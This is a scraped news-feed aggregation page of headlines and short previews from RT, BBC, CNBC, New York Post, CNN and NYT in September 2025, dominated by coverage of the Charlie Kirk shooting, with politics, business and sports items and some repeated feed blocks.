
Article link

Date of publish: Thu, 11 Sep 2025 16:27:07 +0000

Brainwashed Boomers are ready to kill for the Western establishment

Preview The generation associated with all kinds of revolution is now smashing the rebels and protecting the rulers
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 15:54:39 +0000

Why Russia, China and India are on the offensive while the West drifts

Preview Mass politics has vanished from world affairs – and that may be no bad thing
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 15:33:51 +0000

Liberals’ reaction to Charlie Kirk murder shows they are tone-deaf – Tara Reade (VIDEO)

Preview The “ugly rhetoric” pushed by the legacy media has led to the escalation of internal strife in the US, the former Senate aide has said
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 15:11:35 +0000

Indian billionaire’s attempt to beat fraud charges stalls amid US tensions – Bloomberg

Preview Adani Group’s progress with US officials has faltered, as New Delhi and Washington disagree on Russian oil and Pakistan
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 14:36:31 +0000

South Africa determined to sue Israel at International Court of Justice

Preview An official has vowed that Pretoria will continue to work through global institutions to end all acts of genocide against Palestinians
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 14:24:25 +0000

Another African state agrees to host US deportees

Preview Ghana’s leader says his government has agreed a deal with Washington despite a “tightening situation” in bilateral relations
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 14:20:07 +0000

Russian official says visa-free access for Chinese coming soon 

Preview Moscow has framed the move as a reciprocal step after Beijing eased rules for Russians
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 14:12:57 +0000

Qatar slams ‘reckless’ Netanyahu 9/11 comparison

Preview The Israeli prime minister’s statements are a “shameful” bid to justify the missile strike on Doha, Qatar’s foreign ministry has said  
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 14:00:02 +0000

India offers to help Switzerland combat racism

Preview New Delhi was responding to Swiss claims that minority rights are not as protected as they should be
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 13:31:31 +0000

Gaza aid ships targeted in ‘deliberate attack’ – Tunisia (VIDEOS)

Preview The Interior Ministry has said the incident was planned and that investigations are ongoing to uncover the perpetrators
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 13:23:13 +0000

‘Epic’: Ukrainians online celebrate Charlie Kirk’s assassination

Preview Some social media users have praised the killing of conservative activist Charlie Kirk, who was sharply critical of the government in Kiev
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 12:58:57 +0000

You don’t silence Charlie Kirk by killing him – Scott Ritter

Preview The increasing drive for censorship has created a “poisonous environment” in America, the political commentator told RT
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 11:29:03 +0000

India reduces US securities holdings – media

Preview The move to reduce Treasury bills came well before Donald Trump imposed 50% tariffs on most imports from the South Asian nation
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 11:25:13 +0000

Vance names two issues preventing Russia-Ukraine peace deal 

Preview The negotiations hinge on Moscow’s territorial claims and Kiev’s push for security guarantees, the US vice president has said
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 10:44:46 +0000

Charlie Kirk once questioned if Ukraine would try to kill him (VIDEO)

Preview The conservative US activist and fiery critic of Zelensky was fatally shot during a public event in Utah
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 09:52:08 +0000

Canadian firm executive switches sides in Mali mining feud – Reuters

Preview Malian President Assimi Goita reportedly signed a decree in late August appointing Hilaire Diarra, a top Barrick negotiator, as his adviser
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 09:22:47 +0000

MGIMO International School Olympiad: Don’t miss your chance to study for free at a school where global visionaries are made

Preview MGIMO has launched the fourth International Olympiad with free study opportunities
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 08:01:04 +0000

Trump vows to hunt down those funding ‘radical left’ violence (VIDEO)

Preview President Donald Trump has promised to “find each and every one” funding and fueling “radical left” political violence across the US
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 01:31:15 +0000

MSNBC contributor suggests Charlie Kirk killed by ‘supporter shooting their gun off in celebration’

Preview Political analyst Matthew Dowd has reportedly been fired after making “insensitive” remarks about the activist’s death
Read Full Article at RT.com

Article link

Date of publish: Thu, 11 Sep 2025 01:05:31 +0000

Musk calls left the ‘party of murder’ after Charlie Kirk’s shooting

Preview Tech billionaire Elon Musk has accused the radical left of fostering a climate that encourages violence against conservatives
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 23:58:51 +0000

‘Subject’ of interest in Charlie Kirk shooting released after questioning – FBI

Preview The FBI has announced the arrest of the suspect in the fatal shooting of conservative activist Charlie Kirk during an event in Utah
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 22:43:00 +0000

Did you notice America has had 5 assassination attempts in a year?

Preview The US is bearing witness to an alarming trend of politically motivated violence and high-profile assassination attempts
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 22:16:00 +0000

Democrats set sights on ‘political violence’ and guns after Charlie Kirk’s murder

Preview Democrats have lined up to denounce “political” and “gun violence” in the wake of the killing of conservative activist Charlie Kirk
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 22:13:16 +0000

Tucker Carlson claims Israeli spies knew about 9/11 attacks

Preview The US journalist says his forthcoming documentary series on the 9/11 attacks will explore overlooked truths
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 22:06:11 +0000

DEI-run court freed felon who later killed Ukrainian refugee – Fox News host

Preview Iryna Zarutska was brutally murdered on a train in Charlotte, North Carolina, leading many to condemn the justice system for its lenience
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 21:35:49 +0000

Nepalese protesters propose new interim leader

Preview Violent clashes, dubbed Generation Z protests, have left dozens dead and forced the prime minister to resign
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 20:50:50 +0000

Trump calls for killer of Iryna Zarutska to face death penalty

Preview The US president earlier slammed Democrats for failing to lock up career criminal Decarlos Brown before he committed the stabbing
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 20:48:52 +0000

Charlie Kirk succumbs to gunshot wound – Trump

Preview The prominent US right-wing activist has died after being attacked during a public event in Utah
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 20:43:26 +0000

Half-truths and hypocrisy: GPS-jammed Ursula von der Leyen speaks again

Preview From “Europe must fight” to drones sold as peace, the EU president’s state of the union was heavy on rhetoric
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 20:10:44 +0000

FBI offers $100,000 reward in manhunt for Charlie Kirk assassin: As it happened

Preview Conservative activist Charlie Kirk was shot and killed during a Turning Point USA event at Utah Valley University on Wednesday
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 20:02:10 +0000

Hundreds arrested in clashes with riot police at ‘block everything’ protests in France (PHOTOS, VIDEOS)

Preview The massive demonstrations come amid deepening political and economic turmoil in the country
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 19:21:58 +0000

Wondering why the EU is so screwed? Just look at its top diplomat

Preview Kaja Kallas’s “surprise” at the role of the Soviets and the Chinese in WWII reveals the ugly incompetence of Western elites
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 19:10:53 +0000

Conservative US activist Charlie Kirk shot (VIDEOS)

Preview The executive director of Turning Point USA was targeted during debate in Utah
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 18:52:28 +0000

Sergey Karaganov: Europe is fading. We must embrace a new elite for a new Russia

Preview North–South corridors will anchor Greater Eurasia
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 18:18:51 +0000

Durov ‘proud’ that Telegram used in French protests

Preview Telegram founder Pavel Durov has backed the latest French demonstrations and criticized Macron for neglecting his people
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 16:51:17 +0000

Von der Leyen urges EU to drop vetoes on foreign policy

Preview The European Commission wants to scrap unanimous voting on the bloc’s foreign policy decisions
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 16:44:13 +0000

Maduro suggests reason behind US military buildup around Venezuela

Preview Venezuela’s president Maduro has said the US is after its oil and gas, using the fight against drug traffickers as a pretext
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 16:42:51 +0000

‘Russian’ drones in Polish airspace: What we know so far

Preview Moscow has rejected Warsaw’s accusation that it committed an “act of aggression” against the NATO state
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 16:34:47 +0000

EU eyes Russian assets for Ukraine ‘reparations loan’

Preview Ursula von der Leyen’s proposal stops short of outright confiscation of the immobilized funds
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 16:02:12 +0000

British colonial loot should be returned to India – Shashi Tharoor

Preview The Kohinoor diamond symbolizes cultural treasures stolen from South Asia, says Indian politician and host of RT’s new show
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 15:45:07 +0000

Moscow slams Israel over Qatar strike

Preview The airstrike on Qatar that left six dead violated international law and threatened peace efforts, the Russian Foreign Ministry has said  
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 13:37:17 +0000

South Africa condemns Israeli attack in Qatar

Preview Pretoria has deemed the Israeli assault on Qatari territory a blatant violation of international law and national sovereignty
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 12:54:10 +0000

Trump against economic isolation of Russia – Vance

Preview Washington sees joint ventures with Moscow and Kiev as a path to peace, the US vice president has said
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 12:40:09 +0000

Islamic State-linked rebels slaughter mourners in DR Congo attack

Preview The IS Central Africa Province has reportedly claimed responsibility for the North Kivu assault, saying it killed nearly 100 Christians
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 12:33:52 +0000

Russian MOD rejects Poland drone claims

Preview Warsaw has said several UAVs crossed into its air space, with some later shot down
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 12:28:40 +0000

Kremlin responds to Polish ‘drone attack’ claims

Preview Western leaders have consistently accused Moscow without providing any actual evidence, spokesman Dmitry Peskov has said
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 11:52:17 +0000

Chinese EV giant eyes India expansion as ties warm – Bloomberg

Preview BYD wants to send engineers and executives to the neighboring country to resume its training programs
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 11:20:22 +0000

EU to freeze payments to Israel – von der Leyen

Preview The European Commission will put bilateral support with the Jewish state on hold over the ongoing war in Gaza, the official has said
Read Full Article at RT.com

Article link

Date of publish: Wed, 10 Sep 2025 10:14:09 +0000

News

News feeds below.

BBC News

'I will never let your legacy die' - Charlie Kirk's widow gives tearful address after shooting

Erika Kirk vows to fight on against 'evil-doers' in her first statement since her husband's death.

Article link

Date of publish: Sat, 13 Sep 2025 02:35:02 GMT

Charlie Kirk's suspected killer brought into custody after confessing to father

Tyler Robinson is accused of shooting the right-wing activist while he was speaking at a university in Utah on Wednesday.

Article link

Date of publish: Fri, 12 Sep 2025 23:39:56 GMT

Nepal gets first female PM after deadly unrest

Former Supreme Court chief justice Sushila Karki is sworn in after a deal with protest leaders.

Article link

Date of publish: Fri, 12 Sep 2025 19:33:13 GMT

US Top News and Analysis

Gemini, the Winklevoss' crypto exchange, pops more than 14% in Nasdaq debut

Shares of Gemini Space Station rallied Friday after the exchange operator raised $425 million in an initial public offering.

Article link

Date of publish: Fri, 12 Sep 2025 20:19:17 GMT

Pfizer, Moderna shares fall on report that Trump officials will link child deaths to Covid shots

The report says officials plan to include the claim in a presentation next week to a key vaccine panel that advises the CDC on shot access and coverage.

Article link

Date of publish: Fri, 12 Sep 2025 16:47:10 GMT

$7 trillion 'wall of cash' worry is looming for investors once Fed interest rate cuts start

Trillions of dollars are parked in money market funds due to years of high rates, but with the Fed poised to cut, portfolio moves will need to be made.

Article link

Date of publish: Fri, 12 Sep 2025 19:21:19 GMT

New York Post

Dear Abby: Should you tolerate your partner flirting with a stranger?

A Dear Abby reader shares her experience with a partner flirting with other people.

Article link

Date of publish: Sat, 13 Sep 2025 03:00:00 -0400

Retired Louisiana accountant Kent Broussard, 66, fulfills lifelong dream of joining LSU marching band

A 66-year-old former accountant wasn’t afraid to march to his own beat.

Article link

Date of publish: Sat, 13 Sep 2025 02:56:23 -0400

Democratic donors reluctant to give to Biden’s presidential library: report

Former President Joe Biden's new effort to raise money for a presidential library is struggling to attract Democrat donors, according to a report.

Article link

Date of publish: Sat, 13 Sep 2025 02:40:51 -0400

CNN.com - RSS Channel - HP Hero

Some on-air claims about Dominion Voting Systems were false, Fox News acknowledges in statement after deal is announced

Article link

Date of publish: Wed, 19 Apr 2023 12:44:51 GMT

Dominion still has pending lawsuits against election deniers such as Rudy Giuliani and Sidney Powell
Here are the 20 specific Fox broadcasts and tweets Dominion says were defamatory

• Fox-Dominion trial delay 'is not unusual,' judge says • Fox News' defamation battle isn't stopping Trump's election lies

Article link

Date of publish: Mon, 17 Apr 2023 16:01:11 GMT

NYT > Top Stories

Tyler Robinson, Charlie Kirk Shooting Suspect, Went From Scholarship Winner to Wanted Man

Tyler Robinson, the man accused of shooting Charlie Kirk, was a stellar student in high school, raised in a Republican home in Southwest Utah and training to be an electrician.

Article link

Date of publish: Sat, 13 Sep 2025 03:51:29 +0000

What Made Charlie Kirk Influential?

Ken Bensinger, a New York Times reporter covering media and politics who has interviewed Charlie Kirk several times, recalls his influence on right-wing activism and the American political landscape.

Article link

Date of publish: Fri, 12 Sep 2025 21:20:26 +0000

How Law Enforcement Got the Man Suspected of Killing Charlie Kirk

F.B.I. leaders touted the immense federal deployment assigned to find the assassin. But their big break came with a single tip — from the suspect’s own family.

Article link

Date of publish: Sat, 13 Sep 2025 03:04:53 +0000

BBC News

'I will never let your legacy die' - Charlie Kirk's widow gives tearful address after shooting

Erika Kirk vows to fight on against 'evil-doers' in her first statement since her husband's death.

Article link

Date of publish: Sat, 13 Sep 2025 02:35:02 GMT

Charlie Kirk's suspected killer brought into custody after confessing to father

Tyler Robinson is accused of shooting the right-wing activist while he was speaking at a university in Utah on Wednesday.

Article link

Date of publish: Fri, 12 Sep 2025 23:39:56 GMT

Nepal gets first female PM after deadly unrest

Former Supreme Court chief justice Sushila Karki is sworn in after a deal with protest leaders.

Article link

Date of publish: Fri, 12 Sep 2025 19:33:13 GMT

World's first AI minister will eliminate corruption, says Albania's PM

Named Diella, the new minister will help Albania "leapfrog" bigger, more advanced countries, says Edi Rama.

Article link

Date of publish: Fri, 12 Sep 2025 18:48:14 GMT

New Nato mission to bolster eastern flank after Russia drone incursion

Denmark, France and Germany will send jets to strengthen Poland's air defences after Russian drones flew into Polish territory.

Article link

Date of publish: Sat, 13 Sep 2025 04:48:02 GMT

Defiant nuns flee care home for their abandoned convent in the Alps

Sisters Bernadette, Regina and Rita needed a locksmith to get back into their convent, defying Church leaders.

Article link

Date of publish: Sat, 13 Sep 2025 00:42:38 GMT

ICE agent shoots dead man who tried to drive at agents, officials say

The driver, Silverio Villegas-Gonzales, was pronounced dead in hospital shortly after the incident.

Article link

Date of publish: Sat, 13 Sep 2025 01:50:31 GMT

Nigerian chef attempts to make world's largest pot of jollof rice

Hilda Baci and a team of assistants took several hours to complete the popular West African dish.

Article link

Date of publish: Sat, 13 Sep 2025 03:33:04 GMT

Bolsonaro sentenced to 27 years in prison for plotting Brazil coup

The former president has been found guilty of trying to mount coup to cling to power after he lost the election.

Article link

Date of publish: Fri, 12 Sep 2025 01:31:58 GMT

Japan sets record of nearly 100,000 people aged over 100

The number of Japanese centenarians rose to 99,763 in September, with women making up 88% of the total.

Article link

Date of publish: Fri, 12 Sep 2025 13:15:46 GMT

Dutch broadcaster says it will join Eurovision boycott over Israel

The Netherlands follows Ireland in saying it can "no longer justify Israel's inclusion" in the event.

Article link

Date of publish: Fri, 12 Sep 2025 12:37:05 GMT

UK says 'great news' British national freed in Belarus release deal

Julia Fenner was given a long jail term after being detained while entering Belarus in March 2024.

Article link

Date of publish: Fri, 12 Sep 2025 14:43:31 GMT

Schools shut in two Dutch towns over youth violence and abuse videos

All five secondary schools in Beverwijk and Heemskerk are closed in a bid to restore calm.

Article link

Date of publish: Fri, 12 Sep 2025 12:11:41 GMT

US joins UN Security Council condemnation of Israeli strikes on Qatar

The US traditionally blocks actions against its close ally Israel at the United Nations.

Article link

Date of publish: Fri, 12 Sep 2025 13:52:37 GMT

Nigerian pilot tests positive for alcohol after plane veered off runway

The 64-year-old has been sacked, although all the passengers were unharmed.

Article link

Date of publish: Fri, 12 Sep 2025 16:26:39 GMT

North Korea executing more people for watching foreign films and TV, UN finds

The report is based on more than 300 interviews with escapees from Kim Jong Un's secretive regime.

Article link

Date of publish: Fri, 12 Sep 2025 09:00:20 GMT

Anti-apartheid hero's new inquest should lead to justice, Biko family tells BBC

Seen as a martyr in the struggle against white-minority rule, Steve Biko died in police custody in 1977.

Article link

Date of publish: Fri, 12 Sep 2025 17:08:00 GMT

The Israeli army took over my home, used it like a hotel, then set it on fire

Palestinian Nasser Faratawi found his West Bank home and business in ruins months after the IDF seized it.

Article link

Date of publish: Fri, 12 Sep 2025 23:59:17 GMT

Kashmir's young are preserving history - one post at a time

Young Kashmiris are using social media to preserve language, heritage and identity through storytelling.

Article link

Date of publish: Fri, 12 Sep 2025 23:50:39 GMT

As Russian army inches closer, Ukrainians must decide to stay or go

In Bilozerske, eastern Ukraine, people must make the agonising decision to flee or risk staying.

Article link

Date of publish: Fri, 12 Sep 2025 16:00:10 GMT

Who is Tyler Robinson, the suspect in custody for shooting Charlie Kirk?

The FBI says a family member recognised the 22-year-old man from Utah from surveillance images released to the public.

Article link

Date of publish: Fri, 12 Sep 2025 20:56:19 GMT

BBC reports from house linked to Charlie Kirk shooting suspect

Sitting outside was a grey car, similar to the model detectives said the suspect used to drive to the scene of the attack.

Article link

Date of publish: Sat, 13 Sep 2025 01:00:27 GMT

Watch: Video shows moment Kirk shooting suspect flees the scene

The video shows a figure dressed in black dropping from a roof at the Utah campus and fleeing towards a wooded area.

Article link

Date of publish: Fri, 12 Sep 2025 02:49:25 GMT

'Looks like a toy, but it's real': BBC examines a downed Russian drone

Drones like this one were shot down over Polish airspace in the early hours of Wednesday.

Article link

Date of publish: Fri, 12 Sep 2025 02:55:48 GMT

What you need to know about Bolsonaro's coup prison sentence

The former president of Brazil has been sentenced to 27 years in prison after being found guilty for plotting a military coup.

Article link

Date of publish: Fri, 12 Sep 2025 06:14:03 GMT

See Kathmandu's destroyed and barricaded streets after violence

There's an intense military presence on the Nepali capital's streets, says the BBC's Samira Hussain.

Article link

Date of publish: Thu, 11 Sep 2025 14:32:18 GMT

A rooftop figure, gunfire, then panic - how Charlie Kirk shooting unfolded

The conservative activist and influential Trump ally was shot and killed while speaking at Utah Valley University.

Article link

Date of publish: Thu, 11 Sep 2025 13:11:35 GMT

US Top News and Analysis

Gemini, the Winklevoss' crypto exchange, pops more than 14% in Nasdaq debut

Shares of Gemini Space Station rallied Friday after the exchange operator raised $425 million in an initial public offering.

Article link

Date of publish: Fri, 12 Sep 2025 20:19:17 GMT

Pfizer, Moderna shares fall on report that Trump officials will link child deaths to Covid shots

The report says officials plan to include the claim in a presentation next week to a key vaccine panel that advises the CDC on shot access and coverage.

Article link

Date of publish: Fri, 12 Sep 2025 16:47:10 GMT

$7 trillion 'wall of cash' worry is looming for investors once Fed interest rate cuts start

Trillions of dollars are parked in money market funds due to years of high rates, but with the Fed poised to cut, portfolio moves will need to be made.

Article link

Date of publish: Fri, 12 Sep 2025 19:21:19 GMT

Charlie Kirk shooter: Officials identify Tyler Robinson as suspect after arrest

Kirk, an ally of President Donald Trump, was shot during an event at Utah Valley University, kicking off a multi-day manhunt.

Article link

Date of publish: Fri, 12 Sep 2025 17:59:51 GMT

Eli Lilly, Novo Nordisk prepare to face off in the next obesity drug battleground

Eli Lilly and Novo Nordisk are preparing to take their rivalry to the next frontier of weight-loss medication: pills.

Article link

Date of publish: Fri, 12 Sep 2025 16:13:59 GMT

BlackRock's Rieder the latest candidate to interview in Fed chair search

The White House search for the next Federal Reserve chair continues to twist and turn.

Article link

Date of publish: Fri, 12 Sep 2025 22:04:34 GMT

Opendoor board chair Rabois says company is 'bloated,' needs to cut 85% of workforce

Keith Rabois was named chairman of Opendoor this week and the company, which he co-founded, hired former Shopify executive Kaz Nejatian as its new CEO.

Article link

Date of publish: Fri, 12 Sep 2025 20:26:14 GMT

Tim Cook explains why Apple is investing heavily in Corning's glass factory

Apple CEO Tim Cook told CNBC's Jim Cramer why his company is investing $2.5 billion to manufacture glass in Corning's Kentucky factory.

Article link

Date of publish: Fri, 12 Sep 2025 22:41:08 GMT

Apple, Google and Meta are trying to perfect a science fiction gadget: The universal translator

Apple, Google and Meta are capitalizing on advancements in AI to bring new translation features to their latest hardware devices.

Article link

Date of publish: Fri, 12 Sep 2025 22:15:43 GMT

Chinese EV players take fight to legacy European automakers on their home turf

Chinese electric carmakers Xpeng and GAC this week signalled aggressive expansion plans in Europe.

Article link

Date of publish: Sat, 13 Sep 2025 05:49:38 GMT

Joby and Archer join FAA's eVTOL pilot testing program

The Federal Aviation Administration announced an air taxi pilot program on Friday, two months after President Donald Trump's executive order.

Article link

Date of publish: Fri, 12 Sep 2025 17:52:52 GMT

David Ellison has wasted no time putting his stamp on Paramount

As CEO and chairman, David Ellison has signed big deals for talent and content as part of his plan to invest in the entertainment company.

Article link

Date of publish: Fri, 12 Sep 2025 13:58:37 GMT

Massachusetts sues Kalshi alleging illegal sports gambling

Massachusetts argues Kalshi is making more money on sports wagers than legal, licensed sportsbooks.

Article link

Date of publish: Fri, 12 Sep 2025 20:54:59 GMT

Benioff says he's 'inspired' by Palantir, but takes another jab at its prices

Palantir is one-tenth the size of Salesforce by revenue, but its market cap is 66% larger than that of Salesforce.

Article link

Date of publish: Fri, 12 Sep 2025 21:01:35 GMT

Ram cancels plans for all-electric pickup truck

Ram said it would still plan to launch an extended-range electric truck, which is equipped with an electric generator and a gas engine.

Article link

Date of publish: Fri, 12 Sep 2025 20:56:26 GMT

Swatch takes a swipe at Trump’s 39% tariff with switched-up watch

President Donald Trump announced shock 39% levies on Switzerland on Aug. 1. Swatch has hit back.

Article link

Date of publish: Fri, 12 Sep 2025 18:25:49 GMT

Striking defense workers reject Boeing contract offer

More than 3,000 Boeing workers in Missouri have been striking and voted not to ratify a tentative deal with management, according to the union.

Article link

Date of publish: Fri, 12 Sep 2025 19:33:17 GMT

OpenAI announces new mentorship program for budding tech founders

OpenAI introduced the "OpenAI Grove," a program for early tech entrepreneurs looking to build with artificial intelligence, and applications are already open.

Article link

Date of publish: Fri, 12 Sep 2025 21:21:02 GMT

Here's what Paramount Skydance would be buying in a deal for Warner Bros. Discovery

Paramount Skydance CEO and Chairman David Ellison could buy Warner Bros. Discovery and add major TV and film franchises as well as sports rights to his empire.

Article link

Date of publish: Thu, 11 Sep 2025 20:44:49 GMT

Apple iPhone Air's China release delayed

Wireless carriers in China must obtain regulatory approval before they can sell devices with an eSIM, the company said.

Article link

Date of publish: Fri, 12 Sep 2025 16:10:26 GMT

Tether reveals USAT stablecoin, appoints Bo Hines, former White House advisor, to lead U.S. business

Tether has revealed its domestic stablecoin, USAT, and named former White House advisor Bo Hines CEO of its U.S. business.

Article link

Date of publish: Fri, 12 Sep 2025 15:49:36 GMT

S&P 500 fights for another record — plus, Eaton signals big data center opportunity

Every weekday, the Investing Club releases the Homestretch; an actionable afternoon update just in time for the last hour of trading.

Article link

Date of publish: Fri, 12 Sep 2025 18:55:08 GMT

'Bottom of the first inning.' Winklevoss twins see bitcoin reaching $1,000,000 in 10 years

The Winklevoss twins are expecting their cryptocurrency company Gemini Space Station to soon make its public debut.

Article link

Date of publish: Fri, 12 Sep 2025 17:01:48 GMT

RH reports worse-than-expected tariff hit, earnings miss

Luxury furniture retailer RH reported significant tariff hits and uncertainty with President Donald Trump's threatened furniture tariffs.

Article link

Date of publish: Fri, 12 Sep 2025 16:23:40 GMT

Trump says National Guard will deploy to Memphis next, sidestepping Chicago for now

The president called Memphis "deeply troubled."

Article link

Date of publish: Fri, 12 Sep 2025 19:00:07 GMT

'We will do better.' Microsoft CEO Nadella admits company has to rebuild trust with employees

Microsoft CEO Satya Nadella told employees on Thursday that the company has work to do to smooth relations with employees after layoffs.

Article link

Date of publish: Thu, 11 Sep 2025 21:14:14 GMT

How Russia’s ‘salami-slicing’ strategy is testing the West

Salami-slicing refers to the war games tactic of taking incremental steps to achieve strategic goals, without provoking a major counter response.

Article link

Date of publish: Fri, 12 Sep 2025 10:22:34 GMT

Fintech firm Lendbuzz files for IPO

Lendbuzz is aiming to go public amid a wave of fellow fintech companies.

Article link

Date of publish: Fri, 12 Sep 2025 13:48:00 GMT

China warns Mexico to 'think twice' before raising tariffs, threatens countermeasures

In the ongoing trade tensions with the U.S., China's countermeasures have included restrictions on exports of minerals critical to the production of cars.

Article link

Date of publish: Fri, 12 Sep 2025 16:01:28 GMT

We're buying the dip to build up our newest stock position

An update on orders from the CEO doesn't change our investment thesis.

Article link

Date of publish: Fri, 12 Sep 2025 15:18:45 GMT

New York Post

Dear Abby: Should you tolerate your partner flirting with a stranger?

A Dear Abby reader shares her experience with a partner flirting with other people.

Article link

Date of publish: Sat, 13 Sep 2025 03:00:00 -0400

Retired Louisiana accountant Kent Broussard, 66, fulfills lifelong dream of joining LSU marching band

A 66-year-old former accountant wasn’t afraid to march to his own beat.

Article link

Date of publish: Sat, 13 Sep 2025 02:56:23 -0400

Democratic donors reluctant to give to Biden’s presidential library: report

Former President Joe Biden's new effort to raise money for a presidential library is struggling to attract Democrat donors, according to a report.

Article link

Date of publish: Sat, 13 Sep 2025 02:40:51 -0400

Brian Cashman waiting for Yankees’ struggling bullpen to ‘click in’

Brian Cashman’s biggest swings at the trade deadline were about bolstering a struggling bullpen. That remains a work in progress, at best.

Article link

Date of publish: Sat, 13 Sep 2025 02:31:44 -0400

Erika Kirk vows to continue slain husband Charlie’s ‘American Comeback’ college tour this fall and grow the movement: ‘We’ll never surrender’

“The movement is not going anywhere, and it will only grow stronger when you join it.”

Article link

Date of publish: Sat, 13 Sep 2025 02:16:22 -0400

Moment feds descended on suspected Charlie Kirk assassin Tyler Robinson’s Utah apartment, childhood home after arrest

Footage captured several marked and unmarked law enforcement cars parked inside a police-taped-off area outside the townhouse.

Article link

Date of publish: Sat, 13 Sep 2025 01:49:06 -0400

Fired MSNBC analyst Matthew Dowd defends twisted remarks about Charlie Kirk killing that got him axed

"The Right Wing media mob ginned up, went after me on a plethora of platforms, and MSNBC reacted to that mob," Dowd wrote.

Article link

Date of publish: Sat, 13 Sep 2025 01:07:17 -0400

Shirtless inmate hangs out back of corrections van speeding down Oklahoma freeway, while pleading for help: insane video

The van was in the middle of a “routine transport” when the prisoner broke the window and opted for some unauthorized fresh air.

Article link

Date of publish: Sat, 13 Sep 2025 00:47:46 -0400

Lizzo looking good as hell at Christian Siriano’s NYFW show

The Grammy-winning singer-songwriter sat front row alongside Siriano fans Whoopi Goldberg, Patricia Clarkson, Oprah, Gayle King and Heather Graham.

Article link

Date of publish: Sat, 13 Sep 2025 00:39:18 -0400

FanDuel to pay Jaguars $5 million for money stolen by ex-team employee

The Jaguars are getting some reprieve for the money stolen by a former employee for gambling purposes. 

Article link

Date of publish: Sat, 13 Sep 2025 00:34:09 -0400

Chiefs PA announcer resigns before Week 2 home opener after team makes him cross ‘red line’

Dale Carter, the longtime public address announcer for the Kansas City Chiefs, has resigned from his role at Arrowhead Stadium.

Article link

Date of publish: Sat, 13 Sep 2025 00:14:59 -0400

Yankees flex exactly what can get them to season’s finish line — and beyond

The Yankees won a huge game 4-1 over the Red Sox.

Article link

Date of publish: Sat, 13 Sep 2025 00:00:55 -0400

Los Angeles residents fume as sprawling Koreatown homeless encampment turns into ‘city’ with tennis court, garden and BBQ pit

The encampment sits on a vacant Koreatown lot surrounded by apartment buildings and other structures.

Article link

Date of publish: Fri, 12 Sep 2025 23:50:35 -0400

Former Red Sox pitcher Austin Maddox sentenced to 3 years in prison for soliciting a minor

As part of a plea deal, Florida prosecutors dismissed a charge of soliciting a child via computer.

Article link

Date of publish: Fri, 12 Sep 2025 23:49:01 -0400

Jacob deGrom gets plenty of Rangers run support in ‘special’ return to Queens

The 37-year-old deGrom ranks fourth in the American League with a 2.82 ERA.

Article link

Date of publish: Fri, 12 Sep 2025 23:33:48 -0400

Exploitable tight end matchups to target during Week 2

The key to being a successful fantasy football manager is possessing the ability to identify weekly player mismatches and using that knowledge to set your lineups. 

Article link

Date of publish: Fri, 12 Sep 2025 23:17:04 -0400

Chargers lineman Teair Tart gets fined by NFL for Travis Kelce Week 1 slap

The NFL is making Chargers defensive tackle Teair Tart pay for slapping Travis Kelce.

Article link

Date of publish: Fri, 12 Sep 2025 23:11:31 -0400

Sauce Gardner ready to help slow down Bills after injury worry

The star cornerback was limited in practice Thursday with a groin injury, but he practiced fully Friday and does not carry an injury designation for Sunday’s home clash against the Bills.

Article link

Date of publish: Fri, 12 Sep 2025 22:48:32 -0400

Aaron Judge’s record blast, Luis Gil’s gem lead Yankees over Red Sox to start pivotal series

Despite Friday at times feeling like it, October is still a few weeks away. 

Article link

Date of publish: Fri, 12 Sep 2025 22:38:10 -0400

Office Depot facing boycott calls after Michigan store allegedly refused to print poster for Charlie Kirk vigil

